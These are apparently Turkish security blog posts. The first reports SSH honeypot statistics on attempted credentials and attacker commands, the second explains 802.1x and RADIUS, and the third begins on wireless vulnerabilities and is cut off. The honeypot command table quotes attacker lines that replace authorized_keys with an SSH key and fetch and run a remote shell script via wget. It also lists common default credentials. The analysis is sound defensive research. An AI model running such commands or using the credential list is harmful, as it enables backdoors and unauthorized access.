</tbody>
</table><br /><div style="text-align: justify;">İnternete erişimine açık ortam üzerinde oluşturulan 8 adet sunucuyu 2 gün boyuncu açık bırakmamız sonucunda elimize toplamda 229.585 adet giriş isteği 180.339 adet başarılı giriş isteği 49.246 adet başarısız giriş isteği 2237 adet farklı ip adresinden deneme isteği gelmiştir. Sunuculara yapılan başarılı ve başarısız deneme istekleri aşağıda verilmiştir.</div><div><br /></div><div><b>Denenen Kullanıcı Adları</b></div><div><span><!--more--></span><b><br /></b></div>
<table>
<thead>
<tr>
<th>Kullanıcı Adı</th>
<th>Adet</th>
</tr>
</thead>
<tbody>
<tr>
<td>root</td>
<td>180477</td>
</tr>
<tr>
<td>nproc</td>
<td>10041</td>
</tr>
<tr>
<td>admin</td>
<td>1477</td>
</tr>
<tr>
<td>ubuntu</td>
<td>1071</td>
</tr>
<tr>
<td>test</td>
<td>1030</td>
</tr>
<tr>
<td>user</td>
<td>897</td>
</tr>
<tr>
<td>postgres</td>
<td>780</td>
</tr>
<tr>
<td>oracle</td>
<td>623</td>
</tr>
<tr>
<td>git</td>
<td>509</td>
</tr>
<tr>
<td>ftpuser</td>
<td>392</td>
</tr>
</tbody>
</table><br /><div>Yukarıda en fazla giriş denemesi yapılan 10 kullanıcı adı verilmiştir. root kullanıcı adı yüksek farkla en fazla denenen kullanıcı olmasına rağmen nproc kullanıcı adı da çok fazla makinede denenmiştir.</div><div><br /></div><div><b>Denenen Parolalar</b></div><div><span><!--more--></span><b><br /></b></div><div><b><br /></b></div>
<table>
<thead>
<tr>
<th>Parola</th>
<th>Adet</th>
</tr>
</thead>
<tbody>
<tr>
<td>123</td>
<td>134620</td>
</tr>
<tr>
<td>admin</td>
<td>36493</td>
</tr>
<tr>
<td>nproc</td>
<td>10041</td>
</tr>
<tr>
<td>123456</td>
<td>2794</td>
</tr>
<tr>
<td>1234</td>
<td>772</td>
</tr>
<tr>
<td>password</td>
<td>751</td>
</tr>
<tr>
<td>1</td>
<td>586</td>
</tr>
<tr>
<td>12345</td>
<td>496</td>
</tr>
<tr>
<td>test</td>
<td>414</td>
</tr>
<tr>
<td>root</td>
<td>318</td>
</tr>
</tbody>
</table><br /><div style="text-align: justify;">Yukarıda en fazla giriş denemesi yapılan 10 parola verilmiştir. Denenen parolalar karmaşık olmayan kolay parolalar olmuştur. Bu parolaların da otomatize araçların en fazla başarılı giriş yaptığı parolalardan seçildiğini düşünürsek. Hala bu kadar basit parolaların kullanılıyor olması şaşırtıcı gelmektedir.</div><div><br /></div><div><b>Denenen Kullanıcı Adı ve Parola Kombinasyonları</b></div><div><span><!--more--></span><b><br /></b></div>
<table>
<thead>
<tr>
<th>Kullanıcı Adı</th>
<th>Parola</th>
<th>Adet</th>
</tr>
</thead>
<tbody>
<tr>
<td>root</td>
<td>123</td>
<td>133318</td>
</tr>
<tr>
<td>root</td>
<td>admin</td>
<td>36213</td>
</tr>
<tr>
<td>nproc</td>
<td>nproc</td>
<td>10041</td>
</tr>
<tr>
<td>root</td>
<td>root</td>
<td>115</td>
</tr>
<tr>
<td>root</td>
<td>1234</td>
<td>97</td>
</tr>
<tr>
<td>admin</td>
<td>admin</td>
<td>81</td>
</tr>
<tr>
<td>user</td>
<td>user</td>
<td>78</td>
</tr>
<tr>
<td>support</td>
<td>support</td>
<td>67</td>
</tr>
<tr>
<td>pi</td>
<td>raspberry</td>
<td>48</td>
</tr>
<tr>
<td>pi</td>
<td>raspberryraspberry993311</td>
<td>46</td>
</tr>
</tbody>
</table><br /><div><div style="text-align: justify;">Yukarıda en fazla giriş denemesi yapılan 10 kullanıcı adı ve parola kombinasyonu verilmiştir. Bu denemelerde root kullanıcısı üzerinde denenen birçok parola en fazla denemeyi elinde tutmaktadır. Daha sonra nproc-nproc kombinasyonu denenmesine rağmen user, support ve pi kullanıcıları için çok yüksek olmasa da ilk 10 denemede yer almaktadır.</div></div><div><br /></div><div><b>Sistemde Çalıştırılan Komutlar</b></div><div><span><!--more--></span><b><br /></b></div>
<table>
<thead>
<tr>
<th>Komut</th>
<th>Adet</th>
</tr>
</thead>
<tbody>
<tr>
<td style="width: 500px;">cat /proc/cpuinfo | grep name | wc -l</td>
<td>10245</td>
</tr>
<tr>
<td>cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'</td>
<td>10212</td>
</tr>
<tr>
<td>free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'</td>
<td>10202</td>
</tr>
<tr>
<td>which ls</td>
<td>10196</td>
</tr>
<tr>
<td>crontab -l</td>
<td>10193</td>
</tr>
<tr>
<td>uname -m</td>
<td>10180</td>
</tr>
<tr>
<td>uname -a</td>
<td>10177</td>
</tr>
<tr>
<td>lscpu | grep Model</td>
<td>10157</td>
</tr>
<tr>
<td>cd ~ && rm -rf .ssh && mkdir .ssh && echo <code>"ssh_key"</code>>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~</td>
<td>10089</td>
</tr>
<tr>
<td>wget https://`IP_ADDR`/`name.sh`&&chmod 755 <code>name.sh</code>&&bash <code>name.sh</code>&&uname -a</td>
<td>167</td>
</tr>
</tbody>
</table><br /><div style="text-align: justify;">Sunucular üzerinde toplam 153683 komut çalıştırılmıştır yukarıda en fazla çalıştırılan ilk 10 komut verilmiştir. Neredeyse tüm komutlar birbirine yakın miktarlarda çalıştırılmıştır. Süreler göz önüne alındığında otomatize araçların ilk çalıştırdığı komut /proc/cpuinfo ya göz atmak olurken ardından uname komutu kullanılmıştır. 167 adet bash dosyası indirme ve çalıştırma komutu verilmiştir. Bu 167 komut yalnızca 3 ip adresinden gerçekleştirilmiştir.</div><div><br /></div><div><b>Ülkelere Göre Saldırı Dağılımı</b></div><div><span><!--more--></span><b><br /></b></div><div><b><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-tXR11pjfIOs/YHQ9D3CJmnI/AAAAAAAAAIg/LpyWyKqlQcAMn4QcAfjsqtJz-KlefbN7gCLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="301" data-original-width="468" height="412" src="https://lh3.googleusercontent.com/-tXR11pjfIOs/YHQ9D3CJmnI/AAAAAAAAAIg/LpyWyKqlQcAMn4QcAfjsqtJz-KlefbN7gCLcBGAsYHQ/w640-h412/image.png" width="640" /></a></div><br /><br /></b></div><div><b><br /></b></div><div><b>Kıtalara Göre Saldırı Dağılımı</b></div><div><span><!--more--></span><b><br /></b></div><div><b><div class="separator" style="clear: both; text-align: center;"><a href="https://lh3.googleusercontent.com/-mA3HrjD7x6Q/YHQ9NTmGBAI/AAAAAAAAAIk/-sli5OLLHAIiZnJOkssJkF3qfnKk3oqlACLcBGAsYHQ/image.png" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="301" data-original-width="468" height="412" src="https://lh3.googleusercontent.com/-mA3HrjD7x6Q/YHQ9NTmGBAI/AAAAAAAAAIk/-sli5OLLHAIiZnJOkssJkF3qfnKk3oqlACLcBGAsYHQ/w640-h412/image.png" width="640" /></a></div><br /><br /></b></div><div><b><br /></b></div><div style="text-align: justify;">Saldırıların geldiği coğrafi lokasyonlar incelendiğinde Çin yüksek bir farkla en fazla giriş denemesi yapan ülke olmuş daha sonra Amerika ve Singapur gelmektedir. Kıtalarda ise Asya kıtası Çin’den gelen saldırılar sayesinde 1300 den fazla farklı IP adresinden saldırı almıştır.</div><div><br /></div><div><b>Sonuç</b></div><div><span></span><span><!--more--></span><b><br /></b></div><div><div style="text-align: justify;">Yapılan saldırılar incelendiğinde anlaşılacağı gibi 2 gün içinde 229.000 den fazla giriş isteği yapılmıştır. Bunların büyük bir çoğunluğunda root kullanıcısı ile giriş yapılmaya çalışılmıştır. Root kullanıcısının parola ile giriş yapmasını engelleyerek bu saldırılardan etkilenme ihtimalinin önüne geçmiş oluruz. Ayrıca varsayılan olarak gelen nproc,user,pi gibi kullanıcıların parolalarını varsayılan olarak bırakmamak ve parolalarını oluştururken özel karakter koymaya dikkat etmek gerekmektedir.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Makalede en fazla kullanılan 10 adet denemeleri istatistiklerini paylaşmıştım. Ancak gelen tüm giriş denemelerini incelediğimde gerçek ortamlarda karşılaştığım birkaç parolaya rastladım. Örneğin“deger2021!”</div><div><br /></div><div>gibi bir çok kombinasyonda denemeler bulunmaktadır.</div><div><br /></div><div style="text-align: justify;">Diğer bir analiz ise botların kullandığı sözlüklerde artık baş harfi büyük ve sonuna 1 adet özel karakter eklendiği görülmektedir. Bu bilgi doğrultusunda Admin1! gibi parola kullanılması yerine daha uzun ve karmaşık parolalar kullanılmasının daha güvenli olacağı gözükmektedir.</div></div><div><b><div class="separator" style="clear: both; text-align: justify;"><b style="text-align: left;"><br /></b></div><div class="separator" style="clear: both; text-align: center;"><b style="text-align: left;"><br /></b></div><br /><br /></b></div>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-67699102699424221902021-04-06T16:06:00.001+03:002021-04-06T16:06:21.096+03:00802.1x Nedir? Nasıl Çalışmaktadır?<b><h3>802.1x Nedir?</h3></b>
<p>Cihazlar, Local Area Network (LAN) veya Wide Local Area Network (WLAN) noktalarına bağlanmak için kimlik doğrulama mekanizmaları kullanmaktadırlar. IEEE 802.1X, Port-Based Network Access Control (PNAC) için IEEE Standartları tarafından belirlenmiş olan ve korunmuş bir kimlik doğrulama sağlayan güvenli network erişimi standardıdır.</p>
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-xKGGaxiqQ5U/YGxKfhBahII/AAAAAAAAAO8/_lWiSBfUUBoOp9DljE8vgF1XIS-1_0lmACLcBGAsYHQ/s1349/asd.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="600" data-original-height="455" data-original-width="1349" src="https://1.bp.blogspot.com/-xKGGaxiqQ5U/YGxKfhBahII/AAAAAAAAAO8/_lWiSBfUUBoOp9DljE8vgF1XIS-1_0lmACLcBGAsYHQ/s600/asd.png"/></a></div>
<p>Bir 802.1x ağını, ev ağından büyük ölçüde ayıran bir yol vardır. Bu da kimlik doğrulama sunucusu dediğimiz RADIUS sunucusudur. RADIUS Sunucusu kullanıcının kimlik bilgilerini kontrol ederek, organizasyon içinde bu kimlik bilgileriyle aktif bir kişinin olup olmadığına dair kontrol sağlamaktadır. Kullanıcı, RADIS sunucusu tarafından onaylanırsa, network kurallarına göre ve kimlik bilgilerine tanınan izinlere göre kullanıcıya erişim sağlanmaktadır.</p>
<b><h3>802.1x Nasıl Çalışmaktadır?</h3></b>
<p>802.1x, kurum ağına erişmek isteyenler için port açarak, organizasyondaki kullanıcıları doğrulamakta ve networke erişmeleri için yetki vermek üzerine kurulmuş bir network kimlik doğrulama protokolüdür. Kullanıcıların kimlikleri, organizasyon tarafından belirlenen sertifikalarla veya kullanıcılara ait bilgilerle tespit edilmekte, RADIUS sunucusu tarafından onaylanmaktadır. RADIUS sunucusu kimlik doğrulama için gerekli olan iletişimi kuruma ait dizinlerden yapmaktadır. Bu iletişim genel olarak LDAP veya SAML protokolleri üzerinden olmaktadır.</p>
<b><h3>802.1x EAP Güvenliği Nedir?</h3></b>
<p>Extensible Authentication Protocol (EAP), kullanıcıların güvenli bir şekilde kimlik doğrulama gerçekleştirmeleri için tasarlanmış bir protokoldür. Networke ait kimlik doğrulama sunucusu ile kullanıcı arasında iletilen kullanıcıya ait kimlik bilgilerini kriptolojik olarak şifrelemektedir. 802.1x standart olarak iletişimini EAP kullanarak gerçekleştirmekte ve bunu hem kablolu erişimlerde hem de kablosuz (LAN) erişimlerde kullanmaktadır. EAP oluşturduğu şifreli tünel sayesinde dışarıdan yapılacak olan bir dinleme veya araya girme saldırılarına karşı önlem almaktadır.
EAP protokolü kullanıcılara ait bilgiler(kullanıcı adı – parola) ile (EAP-TTLS/PAP ve PEAP-MSCHAPv2) veya dijital bir sertifika yolu ile (EAP-TLS) kimlik doğrulaması işlemini güvenlik altına almaktadır.
</p>
<table>
<thead>
<tr>
<td><b>WPA-2 Enterprise Protokolleri</b></td>
<td><b>Şifreleme Seviyesi</b></td>
<td><b>Kimlik Doğrulama Hızları</b></td>
<td><b>Dizin Desteği</b></td>
<td><b>Kullanıcı Deneyimi</b></td>
</tr>
</thead>
<tbody>
<tr>
<td>EAP-TLS</td>
<td>Public-Private Anahtar Şifrelemesi</td>
<td>Hızlı – 12 adım</td>
<td>SAML/LDAP/MFA Sunuculari</td>
<td>İyi</td>
</tr>
<tr>
<td>PEAP-MSCHAPV2</td>
<td>Şifrelenmiş Kimlik Bilgileri</td>
<td>Orta – 22 adım</td>
<td>Active Directory</td>
<td>Kabul Edilebilir</td>
</tr>
<tr>
<td>EAP-TTLS/PAP</td>
<td>Kimlik Bilgileri Şifrelenmez</td>
<td>Yavaş – 25 adım</td>
<td>Non-AD LDAP Sunucuları</td>
<td>Kötü</td>
</tr>
</tbody>
</table>
<br>
<b><h3>802.1x Neden Kullanılmaktadır?</h3></b>
<p>802.1x güvenli network erişimi için kullanılmaktadır. Eğer kurum hassas ve önemli veriler barındırmaktaysa, bu bilgilerin güvenli bir metot ile taşınması gerekmektedir. 802.1x kullanıldığı zaman cihazlar güvenli bir şekilde erişim noktaları (kurumsal router’lar) ile haberleşebilmektedir. Geçmişe de bakıldığı zaman 802.1x şirketler, üniversiteler ve hastaneler gibi büyük organizasyonlar tarafından kullanıldığı görülmüştür; fakat günümüzde siber güvenlik tehditlerinin artmasıyla beraber küçük işletmeler hızlıca 802.1x konusuna adapte olmaktadırlar.</p>
<p>802.1x sıklıkla WPA2-Enterprise olarak karşımıza çıkmaktadır. WPA2-Enterprise, Pre-Shared Key kullanan ve genel olarak evlerimizde hizmet veren WPA2-Personal ile karıştırılmamalıdır. WPA2-Personal, önemli ve hassas veriler ile işlem gören organizasyonlar için etkili bir protokol değildir ve büyük siber güvenlik riski oluşturmaktadır.</p>
<b><h3>802.1x ve Wi-Fi Farkları</h3></b>
<p>802.1x ve Wi-fi için neredeyse aynı şey denilebilir. IEEE 802.1x standardı ilk olarak Kablolu Ethernet networkleri için dizayn edilmiştir. Wi-fi standart olarak 802.11x olarak belirlenmiştir ve orijinal standardın değiştirilmiş versiyonudur.</p>
<p>Çoğu güvenlik ve network profesyoneli, kablolu ve kablosuz ağlar için 802.1x terimini kullanmaktadır ve bu WPA-2 Enterprise için de geçerlidir.</p>
<b><h3>Kablolu 802.1x Nedir?</h3></b>
<p>Kablosuz ağlarda olduğu gibi, kablolu ağlarda da kimlik doğrulama için benzer bir süreç işlemektedir. Kablolu ağlarda kullanıcı güvenli ağa kendi cihazı üzerinden bağlanmalı ve kullanıcı kendini doğrulamak için imzalı bir dijital sertifika veya kimlik bilgileri kullanmalıdır.</p>
<p>Kablolu 802.1x’in kablosuz ile arasındaki en büyük fark güvenli bağlantının sağlandığı switch’in 802.1x doğrulaması desteği ve Ethernet desteği olması gereğidir. Kablolu bağlantının sağlandığı cihaz ile RADIUS sunucusu,birlikte uyumlu çalışabilmesi sayesinde kullanıcılar doğrulanabilmektedir.</p>
<b><h3>802.1x Güvenliği Nasıl Sağlamaktadır?</h3></b>
<p>802.1x doğru olarak kullanıldığı zaman network kimlik doğrulama güvenliği için altın değerinde bir standarttır. Man-in-the-middle saldırıları ve Evil Twin (Şeytan İkiz) Proxy saldırılarını engelleyerek iletişim sırasında yollanan verilerin çalınmasını önlemektedir. Pre-Shared Key kullanan WPA2-Personal protokolünden kat kat daha güvenlidir.</p>
<p>Ancak, 802.1x’in bu kadar güvenli olması dışında bu standardın güvenliği iki faktöre dayanmaktadır. Faktörler arasındaki ilk değişken 802.1x için gerekli olan konfigürasyondur. Konfigürasyon ayarları bilgi teknolojileri konusundaki uzman bilir kişilere bırakılmalı, son kullanıcı bu ayarlar üzerinde herhangi bir değişiklik yapmamalıdır. </p>
<p>İkinci değişken, kurumun sertifika tabanlı veya kimlik bilgisi tabanlı doğrulama metotlarından birini kullanmasıdır. Sertifika tabanlı EAP-TLS kuruma ait verilerin çalınma riskini en aza indirmekte ve güvenliği yüksek derecede korumaktadır. Kimlik bilgileri ile olan doğrulama noktasında kullanıcıların kimlik bilgileri çalınırsa güvenlik riske atılmaktadır. Sertifika tabanlı doğrulama metodu ile kullanıcıların cihazları üzerinde doğru konfigürasyon ile ağ katılmalarını zorlamaktadır. Bu da güvenliği sağlamaktadır.</p>
<b><h3>802.1x Kriptolojisi</h3></b>
<p>802.1X WPA, genel olarak evdeki Wi-Fi gibi kişisel ağlar için kullanılmaktadır. RC4 tabanlı TKIP (Temperal Key Integrity Protocol) şifrelemesini kullanmaktadır. WPA2’ den daha az güvenlidir fakat genel olarak ev için kullanışlıdır.</p>
<p>802.1X WPA2, TKIP ile uyumlu çalışabilmektedir, fakat genel olarak AES(Advanced Encryption Standart) kullanmaktadır. AES şu anda en güvenli standarttır. Network kurulurken uygulanması daha zor ve maliyetlidir ancak güvenliğin önemli olduğu işletmelerde kullanılmaktadır.</p>
<b><h3>802.1x’in Bileşenleri</h3></b>
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-Zdt0eL-M9K4/YGxPmHpl-SI/AAAAAAAAAPI/o_HXMjhVw8Q5rFEbhur2B8Nwi-gquVuoACLcBGAsYHQ/s1438/asd2.png" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="600" data-original-height="732" data-original-width="1438" src="https://1.bp.blogspot.com/-Zdt0eL-M9K4/YGxPmHpl-SI/AAAAAAAAAPI/o_HXMjhVw8Q5rFEbhur2B8Nwi-gquVuoACLcBGAsYHQ/s600/asd2.png"/></a></div>
<p>802.1x’in çalışabilmesi için gerekli olan birkaç bileşen vardır. Gerçekçi olmak gerekirse, eğer erişim noktanız ve yedek veya kullanmadığınız bir sunucu varsa, güvenli ağ için gerekli olan donanım bileşenlerini elinizin altında bulundurmaktasınız. Bazen sunucuya bile ihtiyacınız olmamaktadır. Bazı erişim noktaları 802.1x için gerekli olan yazılımı yüklü olarak içerisinde taşımaktadır.</p>
<p>Profesyonel olarak çözüm getirerek ürün satın alsanız da veya evde kendinizde yapsanız da, 802.1x’in kalitesi ve güvenilirliği meydana getirilen dizayn tarafından sağlanmaktadır.</p>
<b><h4>İstemciler/Cihazlar</h4></b>
<p>802.1x’in kimlik doğrulamasında yer almak için 802.1x için uyumlu olacak bir cihazınız olmalıdır. Switch veya ağı kontrol eden cihaz için başlatılacak olan EAP işleminde yer almak için ve kullanıcı bilgilerini 802.1x ile uyumlu paylaşabilmek için istemcilerin uyumlu olması gereklidir. Eğer kullanıcıya ait uyumlu değil ise EAP istekleri switch veya ağı kontrol eden cihaz tarafından görmezden gelinmekte, kimlik doğrulama işlemi gerçekleşememektedir.</p>
<p>Günümüzde üretilen cihazların büyük çoğunluğu içinde 802.1x desteği bulunmaktadır. 802.1x için istisna olan cihazlar oyun konsolları, yazıcılar gibi başka cihazlardır. Genelleme yapacak olursak , bu cihazlar ağınızdaki cihazların %10’undan azına denk gelmektedir ve istisna olarak düşünülmektedir.</p>
<b><h4>Switch/Erişim Noktaları/Kontrol Cihazları</h4></b>
<p>802.1x işlemleri için switch’ler ve kontrol cihazları önemli rol oynamaktadır. İstemci, kimlik doğrulamasını sağlayana kadar networke erişemeyecektir. İstemci ile switch arasındaki iletişim 802.1x için değiş tokuş olarak söylenebilmektedir.</p>
<p>İstemci, ağa bağlanmak istediği zaman switch/kontrol cihazı EAPOl-Start paketi ile istemci ve kendisi arasındaki oluşan değiş tokuşu başlatır. İstemcinin bu pakete cevabı, switch/kontrol cihazı tarafından yapılan güvenlik konfigürasyonuna göre RADIUS sunucusuna yönlendirilir. Kimlik doğrulaması tamamlandığında switch/kontrol cihazı RADIUS sunucusundan Access_Accept paketine göre switch/kontrol cihazına kullanıcının erişim seviyesine göre yetki vererek ağa erişimini sağlamaktadır.</p>
<p>Kimlik doğrulamanın sonucu olarak RADIUS sunucusu Access_Accept paketi yollar. Bu paketin içinde switch/kontrol cihazının kullanıcıyı ağa nasıl bağlayacağı üzerine bazı önemli özellikler bulunabilmektedir. Bu paket içindeki özellikler ile kullanıcının hangi vlan’a ait olduğu ve hangi haklara sahip olduğu belirlenmektedir.</p>
<b><h4>RADIUS Sunucusu</h4></b>
<p>RADIUS sunucusu, ağın <b>bodyguard’ı</b> olarak davranmaktadır. Kullanıcı ağa bağlanmak ister, RADIUS kimliklerini doğrular ve kullanıcılara belli bir poliçeye göre yetki verir. Kullanıcı, sertifika tarafından kaydedildiğinde veya kimlik bilgileri doğrulandığında, yetkisi tanımlanarak ağa erişimi sağlanmaktadır. Kullanıcı ne zaman bağlanmak isterse, RADIUS her seferinde sertifikayı veya kimlik bilgilerini doğrulayarak, istenmeyen kişilerin networke erişmelerini önlemektedir.</p>
<p>RADIUS için en önemli güvenlik mekanizması, <b>sunucu sertifika doğrulamasıdır.</b> RADIUS sunucusu, sunucunun sertifikasını kontrol ederek, kullanıcının sahip olduğu cihaza göre ayarlanan konfigürasyon ile beraber ağa erişimi garantilenmektedir. Eğer kullanıcının sahip olduğu cihazın sertifikası, RADIUS’taki ile eşleşmezse veya kimlik bilgileri RADIUS’taki ile eşleşmezse, RADIUS kullanıcıya cevap olarak bilgileri geri dönmez. Bu sayede kullanıcıları Evil Twin (Şeytan İkiz) Proxy saldırısına karşı korumuş olur.</p>
<b><h3>802.1x Neden RADIUS Sunucusuna İhtiyaç Duyar?</h3></b>
<p>802.1x, RADIUS sunucusuna ihtiyaç duyar; çünkü kullanıcılara ait bilgilerin doğrulanması gerekmektedir. Kimlik doğrulama işlemi de RADIUS sunucusunda gerçekleşmektedir. RADIUS sunucusu dizinleri kontrol ederek yetkili kullanıcının yetkilerini ve izinlerini onaylar, bu bilgileri kullanıcıya iletmek üzere switch/kontrol cihazına yollar. RADIUS sunucusu olmadan da kimlik doğrulama işlemi gerçekleşebilmektedir. Bu işlem switch/kontrol cihazı gibi noktalarda gerçekleşebilir fakat güçlü bir erişim noktası tahsil edilmelidir.</p>
<b><h3>Kullanıcı Bilgileri/Dizinler</h3></b>
<p>Kullanıcı bilgileri olarak bahsedilmekte olan bilgiler, kullanıcı adı(username) ve paroladır(password). Çoğu durumda bu bilgilerin bulunduğu noktalar Active Directory veya LDAP sunucularıdır. Herhangi bir RADIUS sunucusu, kullanıcı bilgilerini doğrulamak adına Active Directory veya LDAP sunucularına bağlanabilmektedir. LDAP kullanıldığı zaman birkaç uyarı gerektiren durum olmaktadır. Özellikle şifre hash’lerinin LDAP sunucusunda nasıl tutulduğuna dair uyarılar önemlidir. Eğer şifreniz temiz metin(cleartext) veya NTLM hash’i olarak LDAP sunucusunda saklanmıyorsa, EAP metodunu dikkatli bir şekilde seçmeniz gerekmektedir. Çünkü EAP metodu ile LDAP arasında uyum farklılığı olabilmektedir. Bu sorun RADIUS sunucusundan değil, şifre hash’lerini saklayan sunucu tarafından çıkmaktadır.</p>
<p>Güçlü bir WPA2-Enterprise ağı için ek olarak ayar yapmak gerekmektedir. PKI(Private Key Infrastructure) veya CA(Certificate Authority) gibi sertifikalara sorunsuz bir şekilde kullanıcılara dağıtılmalıdır. Daha önce de bahsedildiği gibi kullanıcılara, kullanıcı adı ve şifre vererek de 802.1x gerçekleştirilebilmektedir. Fakat sertifika ile doğrulama en güvenli yoldur. Son zamanlarda, çoğu kurum EAP-PEAP metodundan EAP-TLS metoduna geçmektedir. Bağlantı hızı ve güvenliğin fark edilebilir bir şekilde artması önemli bir faktördür. Tercihinizi değiştirmek istediğiniz zaman herhangi bir altyapı değişikliğine veya yeni bir cihaz almanıza gerek yoktur. Güncellemelerle bu sorunu giderebilmektesiniz.</p>
<b><h3>802.1X Kimlik Doğrulaması Nasıl Çalışmaktadır?</h3></b>
<p>Kimlik doğrulama sürecinde 4 aşama vardır: İlk Adım(Initilization), Başlatma(Initation), Anlaşma(Negotiaton), Kimlik Doğrulama(Authentication)</p>
<p>Aşağıdaki adımlarda switch, kontrol cihazı ve erişim noktaları gibi network cihazlarından, kimlik doğrulayıcı(authenticator) olarak bahsedilecektir.</p>
<b><h4>İlk Adım(Initialization)</h4></b>
<p>İlk adım, yeni bir cihazın switch veya kontrol cihazına bağlanmak istemesiyle başlamaktadır. 802.1x protokolünde kimlik doğrulayıcı(authenticator) cihazları kendisine gelen istekleri sadece 802.1x isteklerini kabul edecek şekilde ayarlamaktadır ve üzerindeki portları ona göre ayarlamaktadır. 802.1x haricindeki tüm istekler düşürülmektedir.</p>
<b><h4>Başlatma(Initiation)</h4></b>
<p>Kimlik doğrulayıcı(authenticator), bağlanmak isteyen cihaza EAP-isteği atmaktadır. Daha sonra gelen EAP-cevabını, RADIUS sunucusuna erişim paketi olarak iletmektedir. RADIUS sunucusuna gönderilen bu pakette bağlanmak isteyen cihazın bilgileri bulunmaktadır.</p>
<b><h4>Anlaşma(Negotiaton)</h4></b>
<p>Kimlik doğrulayıcı(authenticator), kendisine gelen isteği RADIUS sunucusuna, cihazın bilgileri ve hangi EAP metodunu kullanmak istediği bilgileriyle iletmektedir. RADIUS sunucusu bağlanmak isteyen cihazdan gelen paketi değerlendikten sonra kimlik doğrulayıcısına(authenticator) cevabını yollar ve kimlik doğrulayıcı(authenticator) gelen paketi bağlanmak isteyen cihaza yönlendirmektedir.</p>
<b><h4>Kimlik Doğrulama(Authentication)</h4></b>
<p>Bağlanmak isteyen cihazda EAP metodu belirlendikten sonra ve gelen bilgileri RADIUS sunucusu onayladıktan sonra, RADIUS sunucusu cihaza gerekli olan konfigürasyon bilgilerini iletmektedir. Süreç tamamlandıktan sonra, kimlik doğrulayıcı(authenticator) üzerindeki port “yetkili” olarak ayarlanacak ve 802.1x işlemi tamamlanmış olacaktır. </p>
<b><h3>Ek Olarak</h3></b>
<br>
<b><h4>RADIUS Hesapları</h4></b>
<p>802.1x kullanarak bağlantı sağlamış cihazlardan oturum sırasında kendi bünyesinde cihazlar hakkında bilgi kayıt edebilmektedir. Bu bilgiler, cihazın MAC adresi ve port rakamı olabilmektedir. Bir dahaki bağlantıda RADIUS bu bilgileri tanıyarak kullanıcıya cevap mesajı döner ve bağlantıyı başlatabilmektedir.</p>
<b><h4>VLAN</h4></b>
<p>VLAN, LAN noktalarını bölümleyerek sistemi yönetilmesini ve güvenliği iyi yönde etkileyen bir network konfigürasyon metodudur.</p>
<p>Basitçe, VLAN’lar ağınızı belli kurallar çerçevesinde segmentlere ayırarak ağınızı organize etmenizde fayda sağlamaktadır. Örnek olarak Çalışanların ve Misafirlerin bağlandığı VLAN’lar birbirinden ayrılarak güvenli ağ elde edilmektedir. Bu sayede VLAN’lar arasında olan kötü olaylar birbirini etkilemeyecektir.</p>
<p>Dijital sertifikalar, RADIUS doğrulamasını kullanarak belli rol ve izinlere göre belli VLAN’lere atanabilmektedir. Örnek olarak “it.company.com” ile “satis.company.com” noktasını birbirinden ayırarak kullanıcılara farklı rol atayabilmektesiniz.</p>
<b><h4>MAC Kimlik Doğrulaması</h4></b>
<p>Mac kimlik doğrulaması, cihazların network’e MAC adreslerini kullanarak bağlanmasına yarayan basit bir güvenlik önlemidir. Yaratılan MAC adresi listesine göre cihazların ağa erişimleri denetlenmektedir.</p>
<p>Maalesef ki, MAC adreslerinin taklit edilmesi zor değildir, bu yüzden de MAC kimlik doğrulaması kurum seviyelerinde genel olarak tercih edilmemektedir.</p>
<b><h4>MAC RADIUS</h4></b>
<p>MAC RADIUS, kimlik doğrulama olarak sertifika veya kullanıcı bilgileri yerine cihazın MAC adresini kullanmaktadır.</p>
<b><h4>MAC Bypass</h4></b>
<p>MAC Bypass’ın genel olarak yapılabildiği yerler 802.1x’i varsayılan olarak desteklemeyen cihazlardır. Bu cihazlar yazıcı, oyun konsolu ve benzeri gibi cihazlardır. RADIUS sisteminde bu cihazlar kullanılacaksa, zafiyetli olduğu için farklı VLAN içine alınmalıdır.</p>Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-873221578124165652020-12-21T12:55:00.000+03:002020-12-21T12:55:50.780+03:00KABLOSUZ AĞLARDA GÜVENLİK AÇIKLIKLARIKablosuz ağların günümüzdeki çoğu saldırı çeşidine karşı zafiyeti bulunmaktadır. Bu nedenle, zafiyetlerin farkında olmak, saldırıların etkilerini azaltmak ve saldırıları önlemek için gerekli adımları atmak büyük önem taşımaktadır.
<br><br>
Bu makalede, kablosuz ağlara ne tür saldırılar gelebileceğine değinilecektir. Saldırı çeşitleri hakkında daha fazla bilgi edinmek için CWNA Official Study Guide 4th Edition kitabına göz gezdirebilirsiniz.
<br><br>
<b>Sahte Wireless Cihazları:</b>
<br><br>
Sahte Wireless cihazları veya erişim noktası, network yöneticilerinin bilgisi dahilinde olmayan kablosuz ağ cihazının yetkisiz bir şekilde ağa dahil olmasıdır. Potansiyel saldırganlara kapı açarak ağa dahil olmalarını sağlamaktadır.
<br><br>
Eğer saldırganların ağa direkt olarak erişimi var ise, bu tarz cihazlar ağa zararlı yazılımlarla dahil olabilmektedir. Çalışanlar tarafından fark edilmeyerek kalıcı etkiler bırakabilmektedir.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-7E2yIpyotD4/X-BrCpYscSI/AAAAAAAAAJ4/FVtS6QBM0ZIq23G7dOLavQIsjNr13jkLwCLcBGAsYHQ/s782/1.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="320" data-original-height="528" data-original-width="782" src="https://1.bp.blogspot.com/-7E2yIpyotD4/X-BrCpYscSI/AAAAAAAAAJ4/FVtS6QBM0ZIq23G7dOLavQIsjNr13jkLwCLcBGAsYHQ/s320/1.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
